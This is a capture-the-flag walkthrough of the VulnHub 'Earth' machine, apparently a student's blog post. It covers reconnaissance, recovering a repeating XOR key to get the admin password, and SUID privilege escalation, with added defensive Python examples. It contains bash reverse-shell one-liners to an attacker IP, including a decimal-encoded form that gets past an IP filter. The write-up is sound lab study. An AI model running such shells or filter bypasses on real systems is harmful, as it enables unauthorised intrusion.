
The Planets: Earth target VM penetration write-up

I was busy with competitions a while back, and now it's time to get back to studying, but with finals coming the VM write-ups are still updating slowly…
My knowledge is limited, so go easy on me, masters…


Download: https://www.vulnhub.com/entry/the-planets-earth,755/


Preparation

Target VM: The Planets: Earth ×1, NAT mode
Attacking machine: Kali 2021.2 ×1, on the same subnet as the target

Information gathering

Scan for the IP with arp-scan, then confirm the target by its MAC address


Scan, scan, scan

nmap -sS -sV -A -Pn -n -p- 192.168.155.164


From the nmap results you can see that the two sites only open after adding hosts entries for them
Visiting the target IP directly just shows the default page of the web service

After adding the hosts entries, open them

Penetration testing

A test page, huh, I don't buy it
The other address opens to something like a message-board feature

It doesn't look vulnerable, but the messages you send are displayed on the page, and there were three strings of hex digits there


3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a


A dirb scan turned up an admin backend

But it needs a username and password

Scanning the other site with dirb as well, robots.txt had something in it

What's suspicious is that the last entry actually blocks a file extension, so let's try it.
Found a hint at /testingnotes.txt

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.


Visited testdata.txt and found a few sentences.

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.


From the hint we can tell that we need to decrypt the ciphertext from the message board earlier: XOR it with testdata.txt (XORing a ciphertext with its known plaintext gives back the key).
Decrypting on an online site gave the password earthclimatechangebad4humans
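Why that works, as an added example (my own code, not part of the original write-up): the "XOR encryption" from testingnotes.txt is a repeating-key XOR, so anyone holding one plaintext and its ciphertext gets the key back just by XORing them. The block takes the first 32 bytes of the longer hex string shown above together with the matching start of testdata.txt, recovers the key stream, and finds its period to read off the key; the helper names are mine. Running the same step over the whole message gives the same key, which is the admin password.

```python
"""Known-plaintext recovery of a repeating XOR key.

Added example, not code from the original write-up. CIPHERTEXT_HEX is the
first 32 bytes of the longer hex string posted on the message board;
KNOWN_PLAINTEXT is the matching prefix of testdata.txt.
"""
from itertools import cycle

# First 32 bytes of the longer hex string from the message board.
CIPHERTEXT_HEX = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f1554"
# Matching prefix of testdata.txt (the known plaintext).
KNOWN_PLAINTEXT = b"According to radiometric dating "


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings of equal length."""
    if len(a) != len(b):
        raise ValueError("length mismatch")
    return bytes(x ^ y for x, y in zip(a, b))


def recover_keystream(ciphertext: bytes, plaintext: bytes) -> bytes:
    """Known-plaintext step: key stream = ciphertext XOR plaintext."""
    n = min(len(ciphertext), len(plaintext))
    return xor_bytes(ciphertext[:n], plaintext[:n])


def shortest_period(stream: bytes) -> int:
    """Smallest p with stream[i] == stream[i + p] for every i: the key length."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i + p] for i in range(len(stream) - p)):
            return p
    return len(stream)


def recover_key(ciphertext: bytes, plaintext: bytes) -> bytes:
    """Recover the repeating key from one plaintext/ciphertext pair."""
    ks = recover_keystream(ciphertext, plaintext)
    return ks[:shortest_period(ks)]


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the scheme the testing notes call 'encryption'."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


if __name__ == "__main__":
    key = recover_key(bytes.fromhex(CIPHERTEXT_HEX), KNOWN_PLAINTEXT)
    print("recovered key:", key.decode())
```

The defensive point: once a single known plaintext leaks, a repeating-key XOR is not an encryption scheme at all, and the key length the notes were worrying about makes no difference.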

After logging in I found a command-line interface, so I decided to fire a reverse shell

bash -i >& /dev/tcp/192.168.155.128/2333 0>&1

But it failed; there seems to be a restriction on IP addresses

So, trying to bypass it

https://www.ipaddressguide.com/ip

bash -i >& /dev/tcp/3232275328/2333 0>&1
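Why the decimal form got past the filter, as an added example (my own code, not from the write-up): 3232275328 and 192.168.155.128 are the same IPv4 address, one written as a single 32-bit integer. A check that only looks for dotted-quad text in the command never sees it; comparing canonical addresses does. The blocklist entry and the helper names are mine.

```python
"""Dotted-quad string matching versus canonical address comparison.

Added example, not from the original write-up. BLOCKED is a constructed
blocklist entry; the two commands are the ones used in the write-up.
"""
import ipaddress
import re
from typing import Optional, Set

# Constructed blocklist entry (the attacker's listener address in the write-up).
BLOCKED = {ipaddress.IPv4Address("192.168.155.128")}

DOTTED_QUAD = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def naive_contains_ip(command: str) -> bool:
    """The kind of check the write-up ran into: only spots dotted-quad text."""
    return DOTTED_QUAD.search(command) is not None


def canonical_ipv4(token: str) -> Optional[ipaddress.IPv4Address]:
    """Return the IPv4 address a token denotes, whether written as a dotted
    quad or as a bare 32-bit decimal integer; None if it is neither."""
    try:
        return ipaddress.IPv4Address(token)
    except ipaddress.AddressValueError:
        pass
    if token.isdigit() and int(token) <= 0xFFFFFFFF:
        return ipaddress.IPv4Address(int(token))
    return None


def addresses_in(command: str) -> Set[ipaddress.IPv4Address]:
    """Every token in the command that canonicalizes to an IPv4 address.
    Small integers (ports, fd numbers) show up as low addresses; they are
    harmless noise here because they are compared against the blocklist."""
    found = set()
    for token in re.split(r"[^0-9.]+", command):
        if not token:
            continue
        addr = canonical_ipv4(token)
        if addr is not None:
            found.add(addr)
    return found


def references_blocked_host(command: str, blocked=BLOCKED) -> bool:
    """True if any address in the command, in any written form, is blocked."""
    return bool(addresses_in(command) & set(blocked))


DOTTED_CMD = "bash -i >& /dev/tcp/192.168.155.128/2333 0>&1"
DECIMAL_CMD = "bash -i >& /dev/tcp/3232275328/2333 0>&1"

if __name__ == "__main__":
    for cmd in (DOTTED_CMD, DECIMAL_CMD):
        print(cmd)
        print("  naive filter:", naive_contains_ip(cmd))
        print("  canonical  :", references_blocked_host(cmd))
```

The real fix is not a better blocklist but never handing user input to a shell in the first place; the canonicalization only shows why string matching is the wrong layer for this control.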



Got the first flag

Privilege escalation

find / -perm -u=s -type f 2>/dev/null


First take a look at /usr/bin/reset_root


Execution failed

It's an executable binary, so it can be transferred to the Kali attacking machine with nc.

ltrace -S ./reset_root



You can see that when the program runs it complains that several files are missing

So what now? Just create them.
After creating them on the target and running it again, I got the root password Earth
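What the defender's version of that ltrace step looks like, as an added example (my own code, not from the write-up): a setuid program that changes behaviour depending on whether files exist in /tmp or /dev/shm is trusting directories every local user can write to, which is exactly why creating the missing files was enough. The block parses ltrace-style lines (the sample trace is constructed with placeholder paths and messages, not the real reset_root output) and flags every file check whose path sits in a world-writable directory.

```python
"""Flag file-existence checks that a privileged binary makes in
world-writable directories, from ltrace-style output.

Added example, not from the original write-up. SAMPLE_TRACE is constructed
in ltrace's "func(args) = ret" layout; the paths are placeholders.
"""
import re
from typing import List, Tuple

# Directories that are world-writable on a standard Linux install.
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample trace; paths and message are placeholders.
SAMPLE_TRACE = """\
setuid(0)                                        = 0
access("/dev/shm/PLACEHOLDER_A", 0)              = -1
access("/dev/shm/PLACEHOLDER_B", 0)              = -1
access("/tmp/PLACEHOLDER_C", 0)                  = -1
access("/etc/passwd", 0)                         = 0
puts("trigger files missing, nothing reset")     = 38
"""

# One file-check call per line: call name, quoted path, return value.
FILE_CHECK = re.compile(r'^(access|stat|open|fopen)\("([^"]+)"[^)]*\)\s*=\s*(-?\d+)')


def parse_file_checks(trace: str) -> List[Tuple[str, str, int]]:
    """Return (call, path, return value) for each file-check call in the trace."""
    checks = []
    for line in trace.splitlines():
        m = FILE_CHECK.match(line.strip())
        if m:
            checks.append((m.group(1), m.group(2), int(m.group(3))))
    return checks


def in_world_writable_dir(path: str) -> bool:
    """True if the path lives under a directory any local user can write to."""
    return path.startswith(WORLD_WRITABLE_DIRS)


def untrusted_triggers(trace: str) -> List[str]:
    """Paths a privileged program tests for that any local user could create."""
    return [path for _, path, _ in parse_file_checks(trace)
            if in_world_writable_dir(path)]


if __name__ == "__main__":
    for path in untrusted_triggers(SAMPLE_TRACE):
        print("setuid binary trusts user-creatable file:", path)
```

The same heuristic works on a real ltrace capture of any setuid binary found with the find command above; a hit means the program's privileged behaviour is controlled by whoever can write to /tmp or /dev/shm, which on a shared host is everyone.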

Then su to root and enter the password
Go into /root and get the second flag

With that, the penetration is complete.


At dusk and dawn spring comes late, yet it knows before the hundred flowers. Year after year I plant peach blossoms; they bloom in the season of heartbreak.


That's all for this post. Thanks for reading; to the masters who made it all the way here, the blogger is very grateful.